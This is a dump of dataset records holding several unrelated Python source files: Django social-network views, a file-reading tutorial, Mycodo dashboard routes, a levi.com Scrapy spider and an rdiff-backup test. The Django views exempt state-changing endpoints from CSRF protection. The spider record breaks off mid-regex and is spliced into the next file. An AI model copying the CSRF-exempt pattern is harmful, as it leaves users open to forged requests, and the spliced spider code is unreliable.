authentication successful\n if user is not None:\n login(request, user)\n return HttpResponseRedirect(reverse(\"index\"))\n else:\n return render(request, \"network/login.html\", {\n \"message\": \"Invalid username and/or password.\"\n })\n else:\n return render(request, \"network/login.html\")\n\n\ndef logout_view(request):\n logout(request)\n return HttpResponseRedirect(reverse(\"index\"))\n\ndef register(request):\n if request.method == \"POST\":\n username = request.POST[\"username\"]\n email = request.POST[\"email\"]\n\n # Ensure password matches confirmation\n password = request.POST[\"password\"]\n confirmation = request.POST[\"confirmation\"]\n if password != confirmation:\n return render(request, \"network/register.html\", {\n \"message\": \"Passwords must match.\"\n })\n\n # Attempt to create new user\n try:\n user = User.objects.create_user(username, email, password)\n user.save()\n except IntegrityError:\n return render(request, \"network/register.html\", {\n \"message\": \"Username already taken.\"\n })\n login(request, user)\n return HttpResponseRedirect(reverse(\"index\"))\n else:\n return render(request, \"network/register.html\")\n\n@csrf_exempt\n@login_required\ndef posts(request):\n page = int(request.GET.get(\"page\"))\n p = Paginator(Post.objects.all()[::-1], 5)\n next_page = p.page(page)\n posts = []\n for i in next_page.object_list:\n posts.append({})\n posts[-1][\"id\"] = i.id\n posts[-1][\"author\"] = i.author.username\n posts[-1][\"content\"] = i.content\n posts[-1][\"created\"] = i.created.strftime(\"%b %#d %Y, %#I:%M %p\")\n posts[-1][\"number_of_likes\"] = Like.objects.filter(post = i).count()\n if (Like.objects.filter(post = i, author = request.user).exists()):\n posts[-1][\"liked\"] = 1\n else:\n posts[-1][\"liked\"] = 0\n print(posts)\n return JsonResponse({\n \"number_of_pages\": p.num_pages,\n \"has_next\": next_page.has_next(),\n \"has_previous\": next_page.has_previous(),\n \"posts\": posts\n })\n\n@csrf_exempt\n@login_required\ndef new_post(request):\n if (request.method != \"POST\"):\n return JsonResponse({\"error\": \"POST request required.\"}, status=400)\n author = request.user\n content = json.loads(request.body)[\"content\"]\n Post(author = author, content = content).save()\n return JsonResponse({\"message\": \"Email sent successfully.\"}, status=201)\n\n@csrf_exempt\n@login_required\ndef new_comment(request, post_id):\n if (request.method != \"POST\"):\n return JsonResponse({\"error\": \"POST request required.\"}, status=400)\n author = request.user\n post = Post.objects.get(pk = post_id)\n content = json.loads(request.body)[\"content\"]\n Comment(author = author, content = content, post = post).save()\n return JsonResponse({\"message\": \"Email sent successfully.\"}, status=201)\n\n@csrf_exempt\n@login_required\ndef like(request, post_id):\n if (request.method != \"PUT\"):\n return JsonResponse({\"error\": \"PUT request required.\"}, status=400)\n author = request.user\n post = Post.objects.get(pk = post_id)\n if (Like.objects.filter(author = author, post = post).exists()):\n Like.objects.get(author = author, post = post).delete()\n else:\n Like(author = author, post = post).save()\n return JsonResponse({\"message\": \"Email sent successfully.\"}, status=201)\n\n@csrf_exempt\n@login_required\ndef follow(request, username):\n if (request.method != \"PUT\"):\n return JsonResponse({\"error\": \"PUT request required.\"}, status=400)\n user = User.objects.get(username = username)\n if (Follow.objects.filter(follower = request.user, following = user).exists()):\n Follow.objects.get(follower = request.user, following = user).delete()\n else:\n Follow(follower = request.user, following = user).save()\n return JsonResponse({\"message\": \"Succesful\"}, status=201)\n\n@login_required\ndef user(request, username):\n user = User.objects.get(username = username)\n followers = Follow.objects.filter(following = user).count()\n following = Follow.objects.filter(follower = user).count()\n if (Follow.objects.filter(follower = request.user, following = user).exists()):\n flag = \"Following\"\n else:\n flag = \"Follow\"\n return render(request, \"network/user.html\", {\n \"followers\": followers,\n \"following\": following,\n \"username\": username,\n \"flag\": flag\n })\n\n@csrf_exempt\n@login_required\ndef user_posts(request, username):\n user = User.objects.get(username = username)\n db_posts = Post.objects.filter(author = user)\n page = int(request.GET.get(\"page\"))\n p = Paginator(db_posts, 5)\n next_page = p.page(page)\n posts = []\n for i in next_page.object_list:\n posts.append({})\n posts[-1][\"id\"] = i.id\n posts[-1][\"author\"] = i.author.username\n posts[-1][\"content\"] = i.content\n posts[-1][\"created\"] = i.created.strftime(\"%b %#d %Y, %#I:%M %p\")\n posts[-1][\"number_of_likes\"] = Like.objects.filter(post = i).count()\n if (Like.objects.filter(post = i, author = request.user).exists()):\n posts[-1][\"liked\"] = 1\n else:\n posts[-1][\"liked\"] = 0\n return JsonResponse({\n \"number_of_pages\": p.num_pages,\n \"has_next\": next_page.has_next(),\n \"has_previous\": next_page.has_previous(),\n \"posts\": posts\n })\n \n@login_required\ndef following(request):\n return render(request, \"network/following.html\")\n\n@csrf_exempt\n@login_required\ndef following_posts(request):\n following = Follow.objects.filter(follower = request.user)\n db_posts = []\n for follow in following:\n user = follow.following\n db_posts += (Post.objects.filter(author = user))\n print(db_posts)\n page = int(request.GET.get(\"page\"))\n p = Paginator(db_posts, 5)\n next_page = p.page(page)\n posts = []\n for i in next_page.object_list:\n posts.append({})\n posts[-1][\"id\"] = i.id\n posts[-1][\"author\"] = i.author.username\n posts[-1][\"content\"] = i.content\n posts[-1][\"created\"] = i.created.strftime(\"%b %#d %Y, %#I:%M %p\")\n posts[-1][\"number_of_likes\"] = Like.objects.filter(post = i).count()\n if (Like.objects.filter(post = i, author = request.user).exists()):\n posts[-1][\"liked\"] = 1\n else:\n posts[-1][\"liked\"] = 0\n return JsonResponse({\n \"number_of_pages\": p.num_pages,\n \"has_next\": next_page.has_next(),\n \"has_previous\": next_page.has_previous(),\n \"posts\": posts\n })\n\n@csrf_exempt\n@login_required\ndef get_user(request):\n return JsonResponse({\n \"username\": request.user.username\n })\n\n@csrf_exempt\n@login_required\ndef edit_post(request, post_id):\n post = Post.objects.get(pk = post_id)\n if (request.method != \"PUT\"):\n return JsonResponse({\"error\": \"PUT request required.\"}, status=400)\n content = json.loads(request.body)[\"content\"]\n post.content = content\n post.save()\n return JsonResponse({\"message\": \"Succesful\"}, status=201)\n","repo_name":"lukatko/network","sub_path":"react_app/network/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36109084717","text":"# -*- coding: UTF-8 -*-\n# envo1 python3.9\n\"\"\"\n@Author:大王\n@File:file_reader.py\n@CreateTime:2022/4/10 20:16\n\"\"\"\n\n\n\"\"\"读取文件\"\"\"\n# 首先先创建一个文件并写入我们需要的内容\n# file = open(\"./pi_digits.txt\", 'w')\n# file.write('3.1415926535\\n 8979323846\\n 2643383279')\n# file.close()\n\n# 读取整个文件 使用关键字with 就不用考虑文件的关闭,python会在合适的时机去关闭它\nwith open('pi_digits.txt') as file_object:\n # 读取文件内容并赋值给变量\n contents = file_object.read()\nprint(contents.rstrip())\n\n# 逐行读取\nfile_name = 'pi_digits.txt' # 如果文件不在当前文件夹下可使用路径path\nwith open(file_name) as file_object:\n for line in file_object:\n print(line.rstrip())\n\n# 创建一个包含文件各行内容的列表\nwith open(file_name) as file_object:\n # readlines()方法从文件中读取每一行,并将其存储在一个列表中\n lines = file_object.readlines()\n print(lines)\n\n# 使用文件中的内容\npi_string = ''\nfor line in lines:\n pi_string += line.strip()\n# 读取文件时,默认是字串,如果要使用整数或者浮点数需要转换一下\nprint(float(pi_string))\nprint(len(pi_string))\n\n\n# 练习\nfile_path = './learning_python.txt'\nwith open(file_path) as file_python:\n file_data = file_python.read()\nprint(file_data)\n\nwith open(file_path) as file_python:\n for line in file_python:\n print(line.strip())\n\nwith open(file_path) as file_python:\n data = file_python.readlines()\n for line in data:\n print(line.strip())\n\n# 替换文件中的内容\nwith open(file_path) as file_python:\n for line in file_python:\n contents = line.replace('python', 'C')\n print(contents.strip())\n\n","repo_name":"SirryZBX/my_learning","sub_path":"section10文件和异常/file_reader.py","file_name":"file_reader.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"71766693315","text":"# coding=utf-8\n\"\"\"collection of Page endpoints.\"\"\"\nimport logging\nimport os\n\nimport flask_login\nfrom flask import redirect, render_template, request, url_for\nfrom flask.blueprints import Blueprint\nfrom sqlalchemy import and_\n\nfrom mycodo.config import PATH_HTML_USER\nfrom mycodo.databases.models import (PID, Camera, Conditional, Conversion,\n CustomController, Dashboard,\n DeviceMeasurements, Input, Measurement,\n Method, Misc, NoteTags, Output,\n OutputChannel, Trigger, Unit, Widget)\nfrom mycodo.mycodo_flask.extensions import db\nfrom mycodo.mycodo_flask.forms import forms_dashboard\nfrom mycodo.mycodo_flask.routes_static import inject_variables\nfrom mycodo.mycodo_flask.utils import utils_dashboard, utils_general\nfrom mycodo.utils.outputs import output_types, parse_output_information\nfrom mycodo.utils.system_pi import (\n add_custom_measurements, add_custom_units, parse_custom_option_values_json,\n parse_custom_option_values_output_channels_json, return_measurement_info)\nfrom mycodo.utils.widgets import parse_widget_information\n\nlogger = logging.getLogger('mycodo.mycodo_flask.routes_dashboard')\n\nblueprint = Blueprint('routes_dashboard',\n __name__,\n static_folder='../static',\n template_folder='../templates')\n\n\n@blueprint.context_processor\n@flask_login.login_required\ndef inject_dictionary():\n return inject_variables()\n\n\n@blueprint.route('/save_dashboard_layout', methods=['POST'])\ndef save_dashboard_layout():\n \"\"\"Save positions and sizes of widgets of a particular dashboard.\"\"\"\n if not utils_general.user_has_permission('edit_controllers'):\n return redirect(url_for('routes_general.home'))\n data = request.get_json()\n keys = ('id', 'x', 'y', 'w', 'h')\n for index, each_widget in enumerate(data):\n if all(k in each_widget for k in keys):\n widget_mod = Widget.query.filter(\n Widget.unique_id == each_widget['id']).first()\n if widget_mod:\n widget_mod.position_x = each_widget['x']\n widget_mod.position_y = each_widget['y']\n widget_mod.width = each_widget['w']\n widget_mod.height = each_widget['h']\n db.session.commit()\n return \"success\"\n\n\n@blueprint.route('/dashboard', methods=('GET', 'POST'))\n@flask_login.login_required\ndef page_dashboard_default():\n \"\"\"Load default dashboard.\"\"\"\n dashboard = Dashboard.query.first()\n return redirect(url_for(\n 'routes_dashboard.page_dashboard', dashboard_id=dashboard.unique_id))\n\n\n@blueprint.route('/dashboard-add', methods=('GET', 'POST'))\n@flask_login.login_required\ndef page_dashboard_add():\n \"\"\"Add a dashboard.\"\"\"\n if not utils_general.user_has_permission('edit_controllers'):\n return redirect(url_for('routes_general.home'))\n dashboard_id = utils_dashboard.dashboard_add()\n return redirect(url_for(\n 'routes_dashboard.page_dashboard', dashboard_id=dashboard_id))\n\n\n@blueprint.route('/dashboard/', methods=('GET', 'POST'))\n@flask_login.login_required\ndef page_dashboard(dashboard_id):\n \"\"\"Generate custom dashboard with various data.\"\"\"\n # Retrieve tables from SQL database\n this_dashboard = Dashboard.query.filter(\n Dashboard.unique_id == dashboard_id).first()\n if not this_dashboard:\n return redirect(url_for('routes_dashboard.page_dashboard_default'))\n\n camera = Camera.query.all()\n conditional = Conditional.query.all()\n function = CustomController.query.all()\n widget = Widget.query.all()\n input_dev = Input.query.all()\n device_measurements = DeviceMeasurements.query.all()\n method = Method.query.all()\n misc = Misc.query.first()\n output = Output.query.all()\n output_channel = OutputChannel.query.all()\n pid = PID.query.all()\n tags = NoteTags.query.all()\n\n # Create form objects\n form_base = forms_dashboard.DashboardBase()\n form_dashboard = forms_dashboard.DashboardConfig()\n\n if request.method == 'POST':\n unmet_dependencies = None\n if not utils_general.user_has_permission('edit_controllers'):\n return redirect(url_for('routes_general.home'))\n\n # Dashboard\n if form_dashboard.dash_modify.data:\n utils_dashboard.dashboard_mod(form_dashboard)\n elif form_dashboard.dash_duplicate.data:\n utils_dashboard.dashboard_copy(form_dashboard)\n elif form_dashboard.lock.data:\n utils_dashboard.dashboard_lock(form_dashboard.dashboard_id.data, True)\n elif form_dashboard.unlock.data:\n utils_dashboard.dashboard_lock(form_dashboard.dashboard_id.data, False)\n elif form_dashboard.dash_delete.data:\n utils_dashboard.dashboard_del(form_dashboard)\n return redirect(url_for('routes_dashboard.page_dashboard_default'))\n\n # Widget\n elif form_base.widget_add.data:\n unmet_dependencies = utils_dashboard.widget_add(form_base, request.form)\n elif form_base.widget_mod.data:\n utils_dashboard.widget_mod(form_base, request.form)\n elif form_base.widget_delete.data:\n utils_dashboard.widget_del(form_base)\n\n if unmet_dependencies:\n return redirect(url_for('routes_admin.admin_dependencies',\n device=form_base.widget_type.data))\n\n return redirect(url_for(\n 'routes_dashboard.page_dashboard', dashboard_id=this_dashboard.unique_id))\n\n # Generate all measurement and units used\n dict_measurements = add_custom_measurements(Measurement.query.all())\n dict_units = add_custom_units(Unit.query.all())\n\n # Generate dictionary of each measurement ID with the correct measurement/unit used with it\n dict_measure_measurements = {}\n dict_measure_units = {}\n\n for each_measurement in device_measurements:\n # If the measurement is a PID setpoint, set unit to PID measurement.\n measurement = None\n unit = None\n if each_measurement.measurement_type == 'setpoint':\n setpoint_pid = PID.query.filter(PID.unique_id == each_measurement.device_id).first()\n if setpoint_pid and ',' in setpoint_pid.measurement:\n pid_measurement = setpoint_pid.measurement.split(',')[1]\n setpoint_measurement = DeviceMeasurements.query.filter(\n DeviceMeasurements.unique_id == pid_measurement).first()\n if setpoint_measurement:\n conversion = Conversion.query.filter(\n Conversion.unique_id == setpoint_measurement.conversion_id).first()\n _, unit, measurement = return_measurement_info(setpoint_measurement, conversion)\n else:\n conversion = Conversion.query.filter(\n Conversion.unique_id == each_measurement.conversion_id).first()\n _, unit, measurement = return_measurement_info(each_measurement, conversion)\n if unit:\n dict_measure_measurements[each_measurement.unique_id] = measurement\n dict_measure_units[each_measurement.unique_id] = unit\n\n dict_outputs = parse_output_information()\n dict_widgets = parse_widget_information()\n\n custom_options_values_widgets = parse_custom_option_values_json(\n widget, dict_controller=dict_widgets)\n\n custom_options_values_output_channels = parse_custom_option_values_output_channels_json(\n output_channel, dict_controller=dict_outputs, key_name='custom_channel_options')\n\n widget_types_on_dashboard = []\n custom_widget_variables = {}\n widgets_dash = Widget.query.filter(Widget.dashboard_id == dashboard_id).all()\n for each_dash_widget in widgets_dash:\n # Make list of widget types on this particular dashboard\n if each_dash_widget.graph_type not in widget_types_on_dashboard:\n widget_types_on_dashboard.append(each_dash_widget.graph_type)\n\n # Generate dictionary of returned values from widget modules on this particular dashboard\n if 'generate_page_variables' in dict_widgets[each_dash_widget.graph_type]:\n custom_widget_variables[each_dash_widget.unique_id] = dict_widgets[each_dash_widget.graph_type]['generate_page_variables'](\n each_dash_widget.unique_id, custom_options_values_widgets[each_dash_widget.unique_id])\n\n # generate lists of html files to include in dashboard template\n list_html_files_body = {}\n list_html_files_title_bar = {}\n list_html_files_head = {}\n list_html_files_configure_options = {}\n list_html_files_js = {}\n list_html_files_js_ready = {}\n list_html_files_js_ready_end = {}\n\n for each_widget_type in widget_types_on_dashboard:\n file_html_head = \"widget_template_{}_head.html\".format(each_widget_type)\n path_html_head = os.path.join(PATH_HTML_USER, file_html_head)\n if os.path.exists(path_html_head):\n list_html_files_head[each_widget_type] = file_html_head\n\n file_html_title_bar = \"widget_template_{}_title_bar.html\".format(each_widget_type)\n path_html_title_bar = os.path.join(PATH_HTML_USER, file_html_title_bar)\n if os.path.exists(path_html_title_bar):\n list_html_files_title_bar[each_widget_type] = file_html_title_bar\n\n file_html_body = \"widget_template_{}_body.html\".format(each_widget_type)\n path_html_body = os.path.join(PATH_HTML_USER, file_html_body)\n if os.path.exists(path_html_body):\n list_html_files_body[each_widget_type] = file_html_body\n\n file_html_configure_options = \"widget_template_{}_configure_options.html\".format(each_widget_type)\n path_html_configure_options = os.path.join(PATH_HTML_USER, file_html_configure_options)\n if os.path.exists(path_html_configure_options):\n list_html_files_configure_options[each_widget_type] = file_html_configure_options\n\n file_html_js = \"widget_template_{}_js.html\".format(each_widget_type)\n path_html_js = os.path.join(PATH_HTML_USER, file_html_js)\n if os.path.exists(path_html_js):\n list_html_files_js[each_widget_type] = file_html_js\n\n file_html_js_ready = \"widget_template_{}_js_ready.html\".format(each_widget_type)\n path_html_js_ready = os.path.join(PATH_HTML_USER, file_html_js_ready)\n if os.path.exists(path_html_js_ready):\n list_html_files_js_ready[each_widget_type] = file_html_js_ready\n\n file_html_js_ready_end = \"widget_template_{}_js_ready_end.html\".format(each_widget_type)\n path_html_js_ready_end = os.path.join(PATH_HTML_USER, file_html_js_ready_end)\n if os.path.exists(path_html_js_ready_end):\n list_html_files_js_ready_end[each_widget_type] = file_html_js_ready_end\n\n # Retrieve all choices to populate form drop-down menu\n choices_camera = utils_general.choices_id_name(camera)\n choices_function = utils_general.choices_functions(\n function, dict_units, dict_measurements)\n choices_input = utils_general.choices_inputs(\n input_dev, dict_units, dict_measurements)\n choices_method = utils_general.choices_methods(method)\n choices_output = utils_general.choices_outputs(\n output, OutputChannel, dict_outputs, dict_units, dict_measurements)\n choices_output_channels = utils_general.choices_outputs_channels(\n output, output_channel, dict_outputs)\n choices_output_channels_measurements = utils_general.choices_outputs_channels_measurements(\n output, OutputChannel, dict_outputs, dict_units, dict_measurements)\n choices_output_pwm = utils_general.choices_outputs_pwm(\n output, OutputChannel, dict_outputs, dict_units, dict_measurements)\n choices_pid = utils_general.choices_pids(\n pid, dict_units, dict_measurements)\n choices_pid_devices = utils_general.choices_pids_devices(pid)\n choices_tag = utils_general.choices_tags(tags)\n\n device_measurements_dict = {}\n for meas in device_measurements:\n device_measurements_dict[meas.unique_id] = meas\n\n # Get what each measurement uses for a unit\n use_unit = utils_general.use_unit_generate(\n device_measurements, input_dev, output, function)\n\n return render_template('pages/dashboard.html',\n and_=and_,\n conditional=conditional,\n custom_options_values_output_channels=custom_options_values_output_channels,\n custom_options_values_widgets=custom_options_values_widgets,\n custom_widget_variables=custom_widget_variables,\n table_conversion=Conversion,\n table_function=CustomController,\n table_widget=Widget,\n table_input=Input,\n table_output=Output,\n table_output_channel=OutputChannel,\n table_pid=PID,\n table_device_measurements=DeviceMeasurements,\n table_camera=Camera,\n table_conditional=Conditional,\n table_trigger=Trigger,\n choices_camera=choices_camera,\n choices_function=choices_function,\n choices_input=choices_input,\n choices_method=choices_method,\n choices_output=choices_output,\n choices_output_channels=choices_output_channels,\n choices_output_channels_measurements=choices_output_channels_measurements,\n choices_output_pwm=choices_output_pwm,\n choices_pid=choices_pid,\n choices_pid_devices=choices_pid_devices,\n choices_tag=choices_tag,\n dashboard_id=this_dashboard.unique_id,\n device_measurements_dict=device_measurements_dict,\n dict_measure_measurements=dict_measure_measurements,\n dict_measure_units=dict_measure_units,\n dict_measurements=dict_measurements,\n dict_outputs=dict_outputs,\n dict_units=dict_units,\n dict_widgets=dict_widgets,\n list_html_files_head=list_html_files_head,\n list_html_files_title_bar=list_html_files_title_bar,\n list_html_files_body=list_html_files_body,\n list_html_files_configure_options=list_html_files_configure_options,\n list_html_files_js=list_html_files_js,\n list_html_files_js_ready=list_html_files_js_ready,\n list_html_files_js_ready_end=list_html_files_js_ready_end,\n camera=camera,\n function=function,\n misc=misc,\n pid=pid,\n output=output,\n output_types=output_types(),\n input=input_dev,\n tags=tags,\n this_dashboard=this_dashboard,\n use_unit=use_unit,\n form_base=form_base,\n form_dashboard=form_dashboard,\n widget=widget)\n","repo_name":"kizniche/Mycodo","sub_path":"mycodo/mycodo_flask/routes_dashboard.py","file_name":"routes_dashboard.py","file_ext":"py","file_size_in_byte":15649,"program_lang":"python","lang":"en","doc_type":"code","stars":2708,"dataset":"github-code","pt":"61"} +{"seq_id":"41787704435","text":"from __future__ import absolute_import, division, unicode_literals\n\nimport json\nimport traceback\nimport urlparse\nfrom scrapy.conf import settings\nfrom datetime import datetime\n\nimport re\nfrom product_ranking.br_bazaarvoice_api_script import BuyerReviewsBazaarApi\nfrom product_ranking.items import (BuyerReviews, Price, SiteProductItem)\nfrom product_ranking.spiders import BaseProductsSpider, cond_set_value, FormatterWithDefaults\nfrom product_ranking.utils import is_empty\nfrom scrapy import Request\n\n\nclass LeviProductsSpider(BaseProductsSpider):\n name = 'levi_products'\n country = \"US\"\n locale = \"en_US\"\n allowed_domains = [\"levi.com\", \"www.levi.com\", \"api.bazaarvoice.com\"]\n start_urls = []\n\n SEARCH_URL = \"https://www.levi.com/{country}/{locale}/search/{search_term}\" # TODO: ordering\n\n SWATCHES_URL = \"https://www.levi.com/{country}/{locale}/p/{pid}/swatches\"\n\n per_page = 72\n\n REVIEWS_URL = \"https://api.bazaarvoice.com/data/batch.json?passkey=cahQRLJEuMvjxxJkeF12wrUy3WwLmgCQsS8BPlqmOOOA8&\" \\\n \"apiversion=5.5&displaycode=18056-en_us&resource.q0=products&filter.q0=id%3Aeq%3A{product_id}&stats.q0=\" \\\n \"reviews&filteredstats.q0=reviews&filter_reviews.q0=contentlocale%3Aeq%3Aen_US&filter_reviewcomments.q0=\" \\\n \"contentlocale%3Aeq%3Aen_US&resource.q1=reviews&filter.q1=isratingsonly%3Aeq%3Afalse&filter.q1=\" \\\n \"productid%3Aeq%3A181810040&filter.q1=contentlocale%3Aeq%3Aen_US&sort.q1=relevancy%3Aa1&stats.q1=\" \\\n \"reviews&filteredstats.q1=reviews&include.q1=authors%2Cproducts%2Ccomments&filter_reviews.q1=\" \\\n \"contentlocale%3Aeq%3Aen_US&filter_reviewcomments.q1=contentlocale%3Aeq%3Aen_US&filter_comments.q1=\" \\\n \"contentlocale%3Aeq%3Aen_US&limit.q1=8&offset.q1=0&limit_comments.q1=3&callback=BV._internal.dataHandler0\"\n\n handle_httpstatus_list = [404]\n\n def __init__(self, *args, **kwargs):\n self.br = BuyerReviewsBazaarApi(called_class=self)\n\n super(LeviProductsSpider, self).__init__(\n url_formatter=FormatterWithDefaults(\n country=self.country, locale=self.locale),\n site_name=self.allowed_domains[0], *args, **kwargs)\n\n self.user_agent = 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) ' \\\n 'AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 ' \\\n 'Safari/537.36 (Content Analytics)'\n\n settings.overrides['DOWNLOADER_CLIENTCONTEXTFACTORY'] = 'product_ranking.utils.TLSFlexibleContextFactory'\n middlewares = settings.get('DOWNLOADER_MIDDLEWARES')\n middlewares['product_ranking.custom_middlewares.TunnelRetryMiddleware'] = 2\n\n self.ignore_color_variants = kwargs.get('ignore_color_variants', True)\n if self.ignore_color_variants in ('0', False, 'false', 'False'):\n self.ignore_color_variants = False\n else:\n self.ignore_color_variants = True\n settings.overrides['USE_PROXIES'] = True\n\n def _parse_single_product(self, response):\n return self.parse_product(response)\n\n def _get_product_json(self, response):\n try:\n raw_data = re.search(\n r'LSCO.dtos = (.*?)LSCO.findFeatureValues',\n response.body,\n re.DOTALL | re.MULTILINE\n )\n return json.loads(raw_data.group(1))\n except:\n self.log(\"Failed to load main json: {}\".format(traceback.format_exc()))\n\n def _get_json_from_response(self, response):\n try:\n data = re.search(r\"= 201\n\"\"\"\nimport os\nimport unittest\n\nimport commontest as comtst\nimport fileset\nfrom rdiff_backup import Globals\n\n\nclass ActionRemoveTest(unittest.TestCase):\n \"\"\"\n Test that rdiff-backup properly removes increments\n \"\"\"\n\n def setUp(self):\n self.base_dir = os.path.join(comtst.abs_test_dir, b\"action_remove\")\n self.from1_struct = {\n \"from1\": {\"contents\": {\n \"fileChanged\": {\"content\": \"initial\"},\n \"fileOld\": {},\n \"fileUnchanged\": {\"content\": \"unchanged\"},\n }}\n }\n self.from1_path = os.path.join(self.base_dir, b\"from1\")\n self.from2_struct = {\n \"from2\": {\"contents\": {\n \"fileChanged\": {\"content\": \"modified\"},\n \"fileNew\": {},\n \"fileUnchanged\": {\"content\": \"unchanged\"},\n }}\n }\n self.from2_path = os.path.join(self.base_dir, b\"from2\")\n self.from3_struct = {\n \"from3\": {\"contents\": {\n \"fileChanged\": {\"content\": \"modified again\"},\n \"fileNew\": {},\n \"fileUnchanged\": {\"content\": \"unchanged\"},\n }}\n }\n self.from3_path = os.path.join(self.base_dir, b\"from3\")\n self.from4_struct = {\n \"from4\": {\"contents\": {\n \"fileChanged\": {\"content\": \"modified again\"},\n \"fileEvenNewer\": {},\n \"fileUnchanged\": {\"content\": \"unchanged\"},\n }}\n }\n self.from4_path = os.path.join(self.base_dir, b\"from4\")\n fileset.create_fileset(self.base_dir, self.from1_struct)\n fileset.create_fileset(self.base_dir, self.from2_struct)\n fileset.create_fileset(self.base_dir, self.from3_struct)\n fileset.create_fileset(self.base_dir, self.from4_struct)\n fileset.remove_fileset(self.base_dir, {\"bak\": {\"type\": \"dir\"}})\n self.bak_path = os.path.join(self.base_dir, b\"bak\")\n self.success = False\n # we backup to the same backup repository at different times\n comtst.rdiff_backup_action(\n True, True, self.from1_path, self.bak_path,\n (\"--api-version\", \"201\", \"--current-time\", \"10000\"),\n b\"backup\", ())\n comtst.rdiff_backup_action(\n True, True, self.from2_path, self.bak_path,\n (\"--api-version\", \"201\", \"--current-time\", \"20000\"),\n b\"backup\", ())\n comtst.rdiff_backup_action(\n True, True, self.from3_path, self.bak_path,\n (\"--api-version\", \"201\", \"--current-time\", \"30000\"),\n b\"backup\", ())\n comtst.rdiff_backup_action(\n True, True, self.from4_path, self.bak_path,\n (\"--api-version\", \"201\", \"--current-time\", \"40000\"),\n b\"backup\", ())\n\n def test_action_removeincsolderthan(self):\n \"\"\"test different ways of removing increments\"\"\"\n # removing multiple increments fails without --force\n self.assertNotEqual(comtst.rdiff_backup_action(\n False, None, self.bak_path, None,\n (\"--api-version\", \"201\"),\n b\"remove\", (\"increments\", \"--older-than\", \"1B\")),\n Globals.RET_CODE_OK)\n self.assertEqual(comtst.rdiff_backup_action(\n False, None, self.bak_path, None,\n (\"--api-version\", \"201\", \"--force\"), # now forcing!\n b\"remove\", (\"increments\", \"--older-than\", \"1B\")),\n Globals.RET_CODE_OK)\n # then check that only one increment and mirror remain\n self.assertRegex(comtst.rdiff_backup_action(\n False, None, self.bak_path, None,\n (\"--api-version\", \"201\", \"--parsable\"),\n b\"list\", (\"increments\", ), return_stdout=True),\n b\"\"\"---\n- base: increments.1970-01-0[12]T[0-9][0-9][:-][25]0[:-]00.*.dir\n time: 30000\n type: directory\n- base: bak\n time: 40000\n type: directory\n...\n\n\"\"\")\n\n # check that nothing happens if no increment is old enough issue #616\n self.assertEqual(comtst.rdiff_backup_action(\n False, None, self.bak_path, None,\n (\"--api-version\", \"201\", \"--force\"),\n b\"remove\", (\"increments\", \"--older-than\", \"30000\")),\n Globals.RET_CODE_WARN)\n self.assertRegex(comtst.rdiff_backup_action(\n False, None, self.bak_path, None,\n (\"--api-version\", \"201\", \"--parsable\"),\n b\"list\", (\"increments\", ), return_stdout=True),\n b\"\"\"---\n- base: increments.1970-01-0[12]T[0-9][0-9][:-][25]0[:-]00.*.dir\n time: 30000\n type: directory\n- base: bak\n time: 40000\n type: directory\n...\n\n\"\"\")\n # then remove the last increment\n self.assertEqual(comtst.rdiff_backup_action(\n False, None, self.bak_path, None,\n (\"--api-version\", \"201\", ),\n b\"remove\", (\"increments\", \"--older-than\", \"30001\", \"--size\")),\n Globals.RET_CODE_OK)\n # and check that only the mirror is left\n self.assertEqual(comtst.rdiff_backup_action(\n False, None, self.bak_path, None,\n (\"--api-version\", \"201\", \"--parsable\"),\n b\"list\", (\"increments\", ), return_stdout=True),\n b\"\"\"---\n- base: bak\n time: 40000\n type: directory\n...\n\n\"\"\")\n # then try to remove the mirror\n self.assertEqual(comtst.rdiff_backup_action(\n False, None, self.bak_path, None,\n (\"--api-version\", \"201\", ),\n b\"remove\", (\"increments\", \"--older-than\", \"now\")),\n Globals.RET_CODE_WARN)\n # and check that it is still there\n self.assertEqual(comtst.rdiff_backup_action(\n False, None, self.bak_path, None,\n (\"--api-version\", \"201\", \"--parsable\"),\n b\"list\", (\"increments\", ), return_stdout=True),\n b\"\"\"---\n- base: bak\n time: 40000\n type: directory\n...\n\n\"\"\")\n\n # all tests were successful\n self.success = True\n\n def tearDown(self):\n # we clean-up only if the test was successful\n if self.success:\n fileset.remove_fileset(self.base_dir, self.from1_struct)\n fileset.remove_fileset(self.base_dir, self.from2_struct)\n fileset.remove_fileset(self.base_dir, self.from3_struct)\n fileset.remove_fileset(self.base_dir, self.from4_struct)\n fileset.remove_fileset(self.base_dir, {\"bak\": {\"type\": \"dir\"}})\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"rdiff-backup/rdiff-backup","sub_path":"testing/action_remove_test.py","file_name":"action_remove_test.py","file_ext":"py","file_size_in_byte":6430,"program_lang":"python","lang":"en","doc_type":"code","stars":969,"dataset":"github-code","pt":"61"} +{"seq_id":"71160244356","text":"'''\n迭代器\n要实现迭代器,需要实现两个方法:\n1、__iter__(self):该方法返回一个迭代器(iterator),迭代器必须包含__next__()方法,\n 该方法返回迭代器的下一个元素。\n2、__reserved__(self):实现迭代器的反转。\n'''\n\n\n# 定义一个斐波那契数列的迭代器 f(n+2) = f(n+1) + f(n)\n\nclass Fibs:\n def __init__(self, len):\n self.first = 0\n self.sec = 1\n self.__len = len\n\n def __next__(self):\n # 如果len为0,结束迭代\n if self.__len == 0:\n raise StopIteration\n # 完成数列计算\n self.first, self.sec = self.sec, self.first + self.sec\n # 数列长度减1\n self.__len -= 1\n return self.first\n\n def __iter__(self):\n return self\n\n\n# 创建对象\nf = Fibs(20)\n# 获取迭代器的下一个元素\nprint(next(f))\n# 循环遍历迭代器\nfor i in f:\n print(i, end=' ')","repo_name":"liukai234/python_course_record","sub_path":"容器/迭代器.py","file_name":"迭代器.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"9345212169","text":"import json\nimport os\nimport torch\nimport numpy as np\nfrom argparse import ArgumentParser\nfrom networkx.readwrite import json_graph\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom tqdm import tqdm\nfrom torch_geometric.loader import NeighborSampler, DataLoader\nfrom torch_geometric.nn import 